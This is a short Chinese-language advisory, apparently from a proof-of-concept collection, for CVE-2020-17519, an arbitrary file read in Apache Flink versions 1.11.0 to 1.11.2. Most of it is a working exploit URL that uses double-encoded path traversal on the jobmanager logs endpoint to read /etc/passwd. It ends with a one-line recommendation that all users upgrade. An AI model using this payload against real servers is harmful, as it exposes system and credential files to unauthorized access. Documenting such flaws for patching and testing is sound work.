Apache Flink 任意文件读取(CVE 2020 17519 )

Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。

1.11.0

1.11.1

1.11.2

POC:

http://127.0.0.1/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

所有用户升级最新版